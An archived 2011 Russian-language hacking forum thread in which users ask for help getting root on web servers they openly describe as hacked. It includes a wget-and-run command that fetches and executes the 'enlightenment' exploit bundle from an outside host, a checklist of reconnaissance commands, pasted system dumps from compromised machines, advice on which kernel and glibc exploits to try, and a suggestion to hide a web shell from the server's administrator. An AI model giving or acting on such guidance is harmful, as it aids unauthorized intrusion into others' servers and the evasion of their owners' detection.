ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
01.10.2011, 19:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Эта тема создана для вопросов связанных с повышением привилегий (рутинг, компиляция сплоитов, помощь в поиске сплоитов) на взломанных машинах.
Первая часть темы тут.
Мануал новичкам: Рутанье
Сплоиты можно найти тут и тут
Связка сплоитов enlightenment запускается так:
Код:
Code:
1. wget http://www.grsecurity.net/~spender/exploits/enlightenment.tgz && tar -zxf enlightenment.tgz && cd enlightenment && ./run_null_exploits.sh
2. Выбираем сплоит.
3. PROFIT!!!
ПОСТЫ ОФОРМЛЕННЫЕ ОТЛИЧНО ОТ ПРАВИЛ ПЕРВОГО ПОСТА, УДАЛЯЮТСЯ! пруф
Внимание!
Если в выводе команды uname -a, вы наблюдаете нечто похожее: Linux ****** 2.*.**-NX
Это сервер принадлежит компании SpaceWeb (sweb.ru), и порутать его (сервер) практически невозможно! Так что все посты в котором фигурирует эти сервера (сервера SpaceWeb) УДАЛЯЮТСЯ!
Тоже самое касается серверов компаний Джино (www.jino.ru), Мастерхост (masterhost.ru) и 1gb (1gb.ru). пруф
Сообщение с вопросом должно содержать информацию из вывода следующих команд:- uname -a
- ls -la /boot
- lls -la --full-time /lib (или /lib64)
- mount
- df -h
- cat /etc/issue
- cat /etc/crontab (ls -la cron.d, cron.hourly, cron.monthly, cron.weekly) + вывод содержимого каждого файла из этих директорий.
- cat /proc/version
- cat /proc/sys/vm/mmap_min_addr
- pwd
- ls -la /usr/bin/staprun
- find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
Так же обязательно писать всё, что вы пробовали для повышения привилегий, какие возникли ошибки.
Пример сообщения:
Сообщение от Новичок
Новичок said:
Код:
Code:
sh-3.2# uname -a
Linux 2.6.18-194.8.1.el5 #1 SMP Thu Jul 1 19:04:48 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
sh-3.2# ls -la /lib/libc*
-rwxr-xr-x 1 root root 1693812 Jun 27 21:25 /lib/libc-2.5.so
-rwxr-xr-x 1 root root 191708 Jun 27 21:25 /lib/libcidn-2.5.so
lrwxrwxrwx 1 root root 14 Jun 30 03:04 /lib/libcidn.so.1 -> libcidn-2.5.so
lrwxrwxrwx 1 root root 17 Oct 22 2009 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root 7748 Sep 3 2009 /lib/libcom_err.so.2.1
-rwxr-xr-x 1 root root 45432 Jun 27 21:25 /lib/libcrypt-2.5.so
-rwxr-xr-x 1 root root 1296964 Dec 15 2010 /lib/libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root 14 Sep 15 2008 /lib/libcrypto.so.4 -> libcrypto.so.6
lrwxrwxrwx 1 root root 19 Dec 28 2010 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root 15 Jun 30 03:04 /lib/libcrypt.so.1 -> libcrypt-2.5.so
lrwxrwxrwx 1 root root 11 Jun 30 03:04 /lib/libc.so.6 -> libc-2.5.so
sh-3.2# ls -la /boot
total 17891
drwxr-xr-x 4 root root 3072 Aug 9 2010 .
drwxr-xr-x 29 root root 4096 Jun 23 03:02 ..
-rw-r--r-- 1 root root 0 Mar 14 2010 1
-rwxr--r-- 1 root root 6144 Dec 15 2009 aquota.user
-rw-r--r-- 1 root root 65972 Jan 20 2010 config-2.6.18-164.11.1.el5
-rw-r--r-- 1 root root 65972 Mar 17 2010 config-2.6.18-164.15.1.el5
-rw-r--r-- 1 root root 66891 Jul 2 2010 config-2.6.18-194.8.1.el5
drwxr-xr-x 2 root root 1024 Aug 9 2010 grub
-rw------- 1 root root 2674675 Mar 9 2010 initrd-2.6.18-164.11.1.el5.img
-rw------- 1 root root 2674826 May 9 2010 initrd-2.6.18-164.15.1.el5.img
-rw------- 1 root root 2700121 Aug 9 2010 initrd-2.6.18-194.8.1.el5.img
drwx------ 2 root root 12288 Sep 15 2008 lost+found
-rw-r--r-- 1 root root 80032 Mar 16 2009 message
-rwxr--r-- 1 root root 32 Dec 15 2009 quota.user
-rw-r--r-- 1 root root 108759 Jan 20 2010 symvers-2.6.18-164.11.1.el5.gz
-rw-r--r-- 1 root root 108759 Mar 17 2010 symvers-2.6.18-164.15.1.el5.gz
-rw-r--r-- 1 root root 112713 Jul 2 2010 symvers-2.6.18-194.8.1.el5.gz
-rw-r--r-- 1 root root 1227215 Jan 20 2010 System.map-2.6.18-164.11.1.el5
-rw-r--r-- 1 root root 1227352 Mar 17 2010 System.map-2.6.18-164.15.1.el5
-rw-r--r-- 1 root root 1243148 Jul 2 2010 System.map-2.6.18-194.8.1.el5
-rw-r--r-- 1 root root 1936156 Jan 20 2010 vmlinuz-2.6.18-164.11.1.el5
-rw-r--r-- 1 root root 163 Jan 20 2010 .vmlinuz-2.6.18-164.11.1.el5.hmac
-rw-r--r-- 1 root root 1936444 Mar 17 2010 vmlinuz-2.6.18-164.15.1.el5
-rw-r--r-- 1 root root 163 Mar 17 2010 .vmlinuz-2.6.18-164.15.1.el5.hmac
-rw-r--r-- 1 root root 1954620 Jul 2 2010 vmlinuz-2.6.18-194.8.1.el5
-rw-r--r-- 1 root root 162 Jul 2 2010 .vmlinuz-2.6.18-194.8.1.el5.hmac
sh-3.2# mount
/dev/sda5 on / type ext3 (rw,usrquota)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
/dev/sda8 on /tmp type ext3 (rw,noexec,nosuid)
/dev/sda7 on /home type ext3 (rw,usrquota)
/dev/sdb1 on /backup type ext3 (rw)
/dev/sda3 on /usr type ext3 (rw,usrquota)
/dev/sda2 on /var type ext3 (rw,usrquota)
/dev/sda1 on /boot type ext3 (rw)
tmpfs on /dev/shm type tmpfs (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
/tmp on /var/tmp type none (rw,noexec,nosuid,bind)
sunrpc on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw)
sh-3.2# pwd
/home/user
sh-3.2# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda5 9.7G 987M 8.3G 11% /
/dev/sda8 996M 42M 903M 5% /tmp
/dev/sda7 195G 51G 134G 28% /home
/dev/sdb1 227G 163G 53G 76% /backup
/dev/sda3 9.7G 6.6G 2.6G 72% /usr
/dev/sda2 9.7G 5.5G 3.8G 60% /var
/dev/sda1 99M 24M 71M 25% /boot
tmpfs 3.9G 0 3.9G 0% /dev/shm
sh-3.2# cat /etc/issue
This computer system is for authorized users only. Individuals using this
system without authority or in excess of their authority are subject to
having all their activities on this system monitored and recorded or
examined by any authorized person, including law enforcement, as system
personnel deem appropriate. In the course of monitoring individuals
improperly using the system or in the course of system maintenance, the
activities of authorized users may also be monitored and recorded. Any
material so recorded may be disclosed as appropriate. Anyone using this
system consents to these terms.
Пробовал enlightenment, не берет.
|
|
|
|
03.10.2011, 18:52
|
|
Новичок
Регистрация: 04.10.2009
Сообщений: 10
Провел на форуме:
58602
Репутация:
1
|
|
FreeBSD 8.0
Есть проблема!
сервер :
FreeBSD 8.0-RELEASE-p2 #0: Thu May 20 16:16:55 UTC 2010
Я залил эксплоит и сделал все как тут:
http://www.attackvector.org/freebsd-8-7-local-root-exploit/?utm_source=feedburner&utm_medium=twitter&utm_camp aign=Feed%3A+attackvector+%28Attack+Vector%29
Затем меня выкинуло, и теперь не подключается неткат, пишет :
__________________________________________________ ________________________________
/libexec/ld-elf.so.1: /bin/sh: Unsupported version 37008 of Elf_Verneed entry
__________________________________________________ ________________________________
и не выкидывает.....
в wso 2.4 и wso 2.5 консоль не работает вообще (ни порт забиндить ни команду выполнить)
как можно выполнить на сервере команду еще?
попал в ступор... не пойму куда дальше двигаться...
|
|
|
03.10.2011, 20:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
200
Репутация:
0
|
|
sh-3.2$ uname -a
Linux HPX001.local 2.6.26-1-686 #1 SMP Sat Jan 10 18:29:31 UTC 2009 i686 GNU/Lin
ux
sh-3.2$ ls -la /boot
total 15720
drwxr-xr-x 4 root root 1024 Feb 26 2009 .
drwxr-xr-x 21 root root 4096 Feb 26 2009 ..
-rw-r--r-- 1 root root 882741 Dec 2 2008 System.map-2.6.24-etchnhalf.1-686
-rw-r--r-- 1 root root 928053 Jan 10 2009 System.map-2.6.26-1-686
-rw-r--r-- 1 root root 86418 Dec 2 2008 config-2.6.24-etchnhalf.1-686
-rw-r--r-- 1 root root 91640 Jan 10 2009 config-2.6.26-1-686
drwxr-xr-x 2 root root 1024 Feb 26 2009 grub
-rw-r--r-- 1 root root 4870120 Dec 30 2008 initrd.img-2.6.24-etchnhalf.1-686
-rw-r--r-- 1 root root 6180050 Feb 26 2009 initrd.img-2.6.26-1-686
drwxr-xr-x 2 root root 12288 Dec 30 2008 lost+found
-rw-r--r-- 1 root root 1456344 Dec 2 2008 vmlinuz-2.6.24-etchnhalf.1-686
-rw-r--r-- 1 root root 1505936 Jan 10 2009 vmlinuz-2.6.26-1-686
sh-3.2$ ls -la --full-time /lib/libc*
-rwxr-xr-x 1 root root 1294572 2009-01-04 19:11:21.000000000 +0100 /lib/libc-2.7
.so
lrwxrwxrwx 1 root root 11 2009-02-26 03:56:51.000000000 +0100 /lib/libc.so.
6 -> libc-2.7.so
lrwxrwxrwx 1 root root 14 2009-02-26 04:01:28.000000000 +0100 /lib/libcap.s
o.2 -> libcap.so.2.11
-rw-r--r-- 1 root root 13364 2008-07-26 17:26:50.000000000 +0200 /lib/libcap.s
o.2.11
lrwxrwxrwx 1 root root 17 2009-02-26 03:57:01.000000000 +0100 /lib/libcfont
.so.0 -> libcfont.so.0.0.0
-rw-r--r-- 1 root root 10712 2008-04-15 23:18:10.000000000 +0200 /lib/libcfont
.so.0.0.0
-rw-r--r-- 1 root root 185816 2009-01-04 19:11:21.000000000 +0100 /lib/libcidn-
2.7.so
lrwxrwxrwx 1 root root 14 2009-02-26 03:56:51.000000000 +0100 /lib/libcidn.
so.1 -> libcidn-2.7.so
lrwxrwxrwx 1 root root 17 2009-02-26 03:56:52.000000000 +0100 /lib/libcom_e
rr.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root 8676 2008-10-13 05:33:34.000000000 +0200 /lib/libcom_e
rr.so.2.1
lrwxrwxrwx 1 root root 19 2009-02-26 03:57:01.000000000 +0100 /lib/libconso
le.so.0 -> libconsole.so.0.0.0
-rw-r--r-- 1 root root 72816 2008-04-15 23:18:10.000000000 +0200 /lib/libconso
le.so.0.0.0
-rw-r--r-- 1 root root 38296 2009-01-04 19:11:21.000000000 +0100 /lib/libcrypt
-2.7.so
lrwxrwxrwx 1 root root 15 2009-02-26 03:56:51.000000000 +0100 /lib/libcrypt
.so.1 -> libcrypt-2.7.so
lrwxrwxrwx 1 root root 19 2009-02-26 03:57:01.000000000 +0100 /lib/libctuti
ls.so.0 -> libctutils.so.0.0.0
-rw-r--r-- 1 root root 17024 2008-04-15 23:18:10.000000000 +0200 /lib/libctuti
ls.so.0.0.0
sh-3.2$ mount
/dev/cciss/c0d0p3 on / type ext3 (rw,errors=remount-ro)
tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
procbususb on /proc/bus/usb type usbfs (rw)
udev on /dev type tmpfs (rw,mode=0755)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620)
/dev/cciss/c0d0p1 on /boot type ext2 (rw)
sh-3.2$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/cciss/c0d0p3 72G 6.1G 63G 9% /
tmpfs 1.8G 0 1.8G 0% /lib/init/rw
udev 10M 80K 10M 1% /dev
tmpfs 1.8G 0 1.8G 0% /dev/shm
/dev/cciss/c0d0p1 89M 16M 68M 19% /boot
sh-3.2$ cat /etc/issue
Debian GNU/Linux 5.0 \n \l
sh-3.2$ cat /etc/issue
Debian GNU/Linux 5.0 \n \l
sh-3.2$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --repor
t /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --repor
t /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --repor
t /etc/cron.monthly )
#
sh-3.2$ cat /proc/version
Linux version 2.6.26-1-686 (Debian 2.6.26-13) (waldi@debian.org) (gcc version 4.
1.3 20080704 (prerelease) (Debian 4.1.2-24)) #1 SMP Sat Jan 10 18:29:31 UTC 2009
|
|
|
|
03.10.2011, 22:17
|
|
Новичок
Регистрация: 04.10.2009
Сообщений: 10
Провел на форуме:
58602
Репутация:
1
|
|
Сообщение от rootxcl
rootxcl said:
sh-3.2$ uname -a
Linux HPX001.local 2.6.26-1-686 #1 SMP Sat Jan 10 18:29:31 UTC 2009 i686 GNU/Lin
ux
sh-3.2$ ls -la /boot
total 15720
drwxr-xr-x 4 root root 1024 Feb 26 2009 .
drwxr-xr-x 21 root root 4096 Feb 26 2009 ..
-rw-r--r-- 1 root root 882741 Dec 2 2008 System.map-2.6.24-etchnhalf.1-686
-rw-r--r-- 1 root root 928053 Jan 10 2009 System.map-2.6.26-1-686
-rw-r--r-- 1 root root 86418 Dec 2 2008 config-2.6.24-etchnhalf.1-686
-rw-r--r-- 1 root root 91640 Jan 10 2009 config-2.6.26-1-686
drwxr-xr-x 2 root root 1024 Feb 26 2009 grub
-rw-r--r-- 1 root root 4870120 Dec 30 2008 initrd.img-2.6.24-etchnhalf.1-686
-rw-r--r-- 1 root root 6180050 Feb 26 2009 initrd.img-2.6.26-1-686
drwxr-xr-x 2 root root 12288 Dec 30 2008 lost+found
-rw-r--r-- 1 root root 1456344 Dec 2 2008 vmlinuz-2.6.24-etchnhalf.1-686
-rw-r--r-- 1 root root 1505936 Jan 10 2009 vmlinuz-2.6.26-1-686
sh-3.2$ ls -la --full-time /lib/libc*
-rwxr-xr-x 1 root root 1294572 2009-01-04 19:11:21.000000000 +0100 /lib/libc-2.7
.so
lrwxrwxrwx 1 root root 11 2009-02-26 03:56:51.000000000 +0100 /lib/libc.so.
6 -> libc-2.7.so
lrwxrwxrwx 1 root root 14 2009-02-26 04:01:28.000000000 +0100 /lib/libcap.s
o.2 -> libcap.so.2.11
-rw-r--r-- 1 root root 13364 2008-07-26 17:26:50.000000000 +0200 /lib/libcap.s
o.2.11
lrwxrwxrwx 1 root root 17 2009-02-26 03:57:01.000000000 +0100 /lib/libcfont
.so.0 -> libcfont.so.0.0.0
-rw-r--r-- 1 root root 10712 2008-04-15 23:18:10.000000000 +0200 /lib/libcfont
.so.0.0.0
-rw-r--r-- 1 root root 185816 2009-01-04 19:11:21.000000000 +0100 /lib/libcidn-
2.7.so
lrwxrwxrwx 1 root root 14 2009-02-26 03:56:51.000000000 +0100 /lib/libcidn.
so.1 -> libcidn-2.7.so
lrwxrwxrwx 1 root root 17 2009-02-26 03:56:52.000000000 +0100 /lib/libcom_e
rr.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root 8676 2008-10-13 05:33:34.000000000 +0200 /lib/libcom_e
rr.so.2.1
lrwxrwxrwx 1 root root 19 2009-02-26 03:57:01.000000000 +0100 /lib/libconso
le.so.0 -> libconsole.so.0.0.0
-rw-r--r-- 1 root root 72816 2008-04-15 23:18:10.000000000 +0200 /lib/libconso
le.so.0.0.0
-rw-r--r-- 1 root root 38296 2009-01-04 19:11:21.000000000 +0100 /lib/libcrypt
-2.7.so
lrwxrwxrwx 1 root root 15 2009-02-26 03:56:51.000000000 +0100 /lib/libcrypt
.so.1 -> libcrypt-2.7.so
lrwxrwxrwx 1 root root 19 2009-02-26 03:57:01.000000000 +0100 /lib/libctuti
ls.so.0 -> libctutils.so.0.0.0
-rw-r--r-- 1 root root 17024 2008-04-15 23:18:10.000000000 +0200 /lib/libctuti
ls.so.0.0.0
sh-3.2$ mount
/dev/cciss/c0d0p3 on / type ext3 (rw,errors=remount-ro)
tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
procbususb on /proc/bus/usb type usbfs (rw)
udev on /dev type tmpfs (rw,mode=0755)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620)
/dev/cciss/c0d0p1 on /boot type ext2 (rw)
sh-3.2$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/cciss/c0d0p3 72G 6.1G 63G 9% /
tmpfs 1.8G 0 1.8G 0% /lib/init/rw
udev 10M 80K 10M 1% /dev
tmpfs 1.8G 0 1.8G 0% /dev/shm
/dev/cciss/c0d0p1 89M 16M 68M 19% /boot
sh-3.2$ cat /etc/issue
Debian GNU/Linux 5.0 \n \l
sh-3.2$ cat /etc/issue
Debian GNU/Linux 5.0 \n \l
sh-3.2$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --repor
t /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --repor
t /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --repor
t /etc/cron.monthly )
#
sh-3.2$ cat /proc/version
Linux version 2.6.26-1-686 (Debian 2.6.26-13) (waldi@debian.org) (gcc version 4.
1.3 20080704 (prerelease) (Debian 4.1.2-24)) #1 SMP Sat Jan 10 18:29:31 UTC 2009
попробуй это :
https://rdot.org/forum/showthread.php?t=817
|
|
|
|
03.10.2011, 22:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
rootxcl:
Код:
Code:
1. wget http://www.grsecurity.net/~spender/enlightenment.tgz && tar -zxf enlightenment.tgz && cd enlightenment && ./run_null_exploits.sh
2. Выбираем сплоит.
3. PROFIT!!!
|
|
|
|
03.10.2011, 23:37
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от Expl0ited
Expl0ited said:
rootxcl
:
Код:
Code:
1. wget http://www.grsecurity.net/~spender/enlightenment.tgz && tar -zxf enlightenment.tgz && cd enlightenment && ./run_null_exploits.sh
2. Выбираем сплоит.
3. PROFIT!!!
Все сплоиты из enlightenment'a используют NULL-pointer.
Т.ч. если /proc/sys/vm/mmap_min_addr есть и его значение больше 0, то хер что выйдет.
rootxcl
Скинь результат выполнения команды cat /proc/sys/vm/mmap_min_addr 2>&1
Если файл такой будет и значение больше чем 0, то пробуй Glibc (/tmp у тебя отдельно не примонтирован, должно взять без проблем. (дефолтая эксплуатация через либу libc-*.so))
Сообщение от Sidarovich1975
Sidarovich1975 said:
Есть проблема!
сервер :
FreeBSD 8.0-RELEASE-p2 #0: Thu May 20 16:16:55 UTC 2010
Я залил эксплоит и сделал все как тут:
http://www.attackvector.org/freebsd-8-7-local-root-exploit/?utm_source=feedburner&utm_medium=twitter&utm_camp aign=Feed%3A+attackvector+%28Attack+Vector%29
Затем меня выкинуло, и теперь не подключается неткат, пишет :
__________________________________________________ ________________________________
/libexec/ld-elf.so.1: /bin/sh: Unsupported version 37008 of Elf_Verneed entry
__________________________________________________ ________________________________
и не выкидывает.....
в wso 2.4 и wso 2.5 консоль не работает вообще (ни порт забиндить ни команду выполнить)
как можно выполнить на сервере команду еще?
попал в ступор... не пойму куда дальше двигаться...
Ты делал все с двух ТЕРМИНАЛОВ, как написано в сплоите или побрезговал и попытался все сделать с шелла?
Ну чтож, жди пока админ починит и попробуй потом более упрощенные версии даного сплоита отсюда: https://rdot.org/forum/showthread.php?t=601
Пролистай тему, там выложено две модификации.
|
|
|
|
04.10.2011, 00:46
|
|
Новичок
Регистрация: 04.10.2009
Сообщений: 10
Провел на форуме:
58602
Репутация:
1
|
|
Сообщение от Tigger
Tigger said:
Все сплоиты из enlightenment'a используют NULL-pointer.
Т.ч. если /proc/sys/vm/mmap_min_addr есть и его значение больше 0, то хер что выйдет.
rootxcl
Скинь результат выполнения команды
cat /proc/sys/vm/mmap_min_addr 2>&1
Если файл такой будет и значение больше чем 0, то пробуй Glibc (/tmp у тебя отдельно не примонтирован, должно взять без проблем. (дефолтая эксплуатация через либу libc-*.so))
Ты делал все с
двух ТЕРМИНАЛОВ
, как написано в сплоите или побрезговал и попытался все сделать с шелла?
Ну чтож, жди пока админ починит и попробуй потом более упрощенные версии даного сплоита отсюда: https://rdot.org/forum/showthread.php?t=601
Пролистай тему, там выложено две модификации.
не, ну написал же... ВСЕ как по ссылке... ну а админ как поймет, что что-то неладно? там порт открытый висел х.з. сколько. нужен вариант другой какой-то, чтобы команды выполнять...
|
|
|
|
04.10.2011, 01:58
|
|
Новичок
Регистрация: 04.10.2009
Сообщений: 5
Провел на форуме:
9361
Репутация:
0
|
|
Сообщение от Sidarovich1975
Sidarovich1975 said:
не, ну написал же... ВСЕ как по ссылке... ну а админ как поймет, что что-то неладно? там порт открытый висел х.з. сколько. нужен вариант другой какой-то, чтобы команды выполнять...
Ну админ, поймёт что что-то не так, как минимум из-за того что у него команды в консоле тоже не будут выполнятся...как и у любого другого пользователя! Думаю ответ на вопрос о другом варианте отпал ? пока не исправят последствия твоих действий...консоль не заработает! Так что единственное что ты можешь сделать, это постараться спрятать шелл так, что бы его не нашли...т.к. если не админ, так его хостер 100% буду проверять сервак на наличии шелов.
|
|
|
|
05.10.2011, 22:14
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Народ сможет кто помочь с этим:
Сообщение от None
uname -a
Linux ns1.***.de 2.6.18-338.19.1.el5.lve0.8.36 #1 SMP Wed Jul 27 13:20:06 EEST 2011 x86_64 x86_64 x86_64 GNU/Linux
ls -la /boot
drwxr-xr-x 3 root root 4096 Oct 4 06:06 .
drwxr-xr-x 26 root root 4096 Oct 5 05:03 ..
-rw-r--r-- 1 root root 163 Jul 15 14:04 .vmlinuz-2.6.18-238.19.1.el5.hmac
-rw-r--r-- 1 root root 158 Jan 13 2011 .vmlinuz-2.6.18-238.el5.hmac
-rw-r--r-- 1 root root 162 Sep 7 02:46 .vmlinuz-2.6.18-274.3.1.el5.hmac
-rw-r--r-- 1 root root 1261160 Jul 15 14:04 System.map-2.6.18-238.19.1.el5
-rw-r--r-- 1 root root 1260254 Jan 13 2011 System.map-2.6.18-238.el5
-rw-r--r-- 1 root root 1268881 Sep 7 02:46 System.map-2.6.18-274.3.1.el5
-rw-r--r-- 1 root root 1312050 Jul 27 12:26 System.map-2.6.18-338.19.1.el5.lve0.8.36
-rw-r--r-- 1 root root 67215 Jul 15 14:04 config-2.6.18-238.19.1.el5
-rw-r--r-- 1 root root 67210 Jan 13 2011 config-2.6.18-238.el5
-rw-r--r-- 1 root root 67613 Sep 7 02:46 config-2.6.18-274.3.1.el5
-rw-r--r-- 1 root root 68013 Jul 27 12:26 config-2.6.18-338.19.1.el5.lve0.8.36
drwxr-xr-x 2 root root 4096 Oct 5 01:51 grub
-rw------- 1 root root 2676916 Aug 31 13:25 initrd-2.6.18-238.19.1.el5.img
-rw------- 1 root root 2676109 Aug 31 19:22 initrd-2.6.18-238.el5.img
-rw------- 1 root root 2683316 Sep 22 08:32 initrd-2.6.18-274.3.1.el5.img
-rw------- 1 root root 2683198 Oct 4 06:06 initrd-2.6.18-338.19.1.el5.lve0.8.36.img
-rw-r--r-- 1 root root 113923 Jul 15 14:04 symvers-2.6.18-238.19.1.el5.gz
-rw-r--r-- 1 root root 113923 Jan 13 2011 symvers-2.6.18-238.el5.gz
-rw-r--r-- 1 root root 116158 Sep 7 02:47 symvers-2.6.18-274.3.1.el5.gz
-rw-r--r-- 1 root root 121331 Jul 27 12:27 symvers-2.6.18-338.19.1.el5.lve0.8.36.gz
-rw-r--r-- 1 root root 2097180 Jul 15 14:04 vmlinuz-2.6.18-238.19.1.el5
-rw-r--r-- 1 root root 2094652 Jan 13 2011 vmlinuz-2.6.18-238.el5
-rw-r--r-- 1 root root 2106012 Sep 7 02:46 vmlinuz-2.6.18-274.3.1.el5
-rw-r--r-- 1 root root 2010108 Jul 27 12:26 vmlinuz-2.6.18-338.19.1.el5.lve0.8.36
ls -la --full-time /lib/libc*
-rwxr-xr-x 1 root root 1693812 2011-08-12 19:48:50.000000000 +0200 /lib/libc-2.5.so
lrwxrwxrwx 1 root root 11 2011-09-14 02:06:44.000000000 +0200 /lib/libc.so.6 -> libc-2.5.so
lrwxrwxrwx 1 root root 11 2011-08-31 19:18:03.000000000 +0200 /lib/libcap.so -> libcap.so.1
lrwxrwxrwx 1 root root 14 2011-08-31 19:17:36.000000000 +0200 /lib/libcap.so.1 -> libcap.so.1.10
-rwxr-xr-x 1 root root 11560 2007-03-14 19:15:10.000000000 +0100 /lib/libcap.so.1.10
-rwxr-xr-x 1 root root 191708 2011-08-12 19:48:50.000000000 +0200 /lib/libcidn-2.5.so
lrwxrwxrwx 1 root root 14 2011-09-14 02:06:44.000000000 +0200 /lib/libcidn.so.1 -> libcidn-2.5.so
lrwxrwxrwx 1 root root 17 2011-09-14 02:06:57.000000000 +0200 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root 6364 2011-07-22 07:04:15.000000000 +0200 /lib/libcom_err.so.2.1
-rwxr-xr-x 1 root root 45432 2011-08-12 19:48:50.000000000 +0200 /lib/libcrypt-2.5.so
lrwxrwxrwx 1 root root 15 2011-09-14 02:06:44.000000000 +0200 /lib/libcrypt.so.1 -> libcrypt-2.5.so
-rwxr-xr-x 1 root root 1295616 2011-09-14 21:45:12.000000000 +0200 /lib/libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root 14 2011-08-31 13:52:57.000000000 +0200 /lib/libcrypto.so.4 -> libcrypto.so.6
lrwxrwxrwx 1 root root 19 2011-10-04 06:16:31.000000000 +0200 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8e
mount
/dev/sda1 on / type ext3 (rw,usrquota)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
tmpfs on /dev/shm type tmpfs (rw)
/dev/sdb1 on /hdd2 type ext3 (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
/usr/tmpDSK on /tmp type ext3 (rw,noexec,nosuid,loop=/dev/loop0)
/tmp on /var/tmp type none (rw,noexec,nosuid,bind)
df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda1 899G 77G 776G 9% /
tmpfs 7.8G 0 7.8G 0% /dev/shm
/dev/sdb1 917G 148G 723G 17% /hdd2
/usr/tmpDSK 485M 23M 438M 5% /tmp
cat /etc/issue
CloudLinux Server release 5.7
Kernel \r on an \m
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly
cat /proc/version
Linux version 2.6.18-338.19.1.el5.lve0.8.36 (***@***.com) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-51)) #1 SMP Wed Jul 27 13:20:06 EEST 2011
cat /proc/sys/vm/mmap_min_addr
4096
пробовал: enlightenment и сплоиты 2.6.18-ветки, компилятора на сервире нет или не доступен... |
|
|
|
05.10.2011, 22:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
winstrool, не рутается.
Сообщение от None
Jul 27 13:20:06 EEST 2011
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
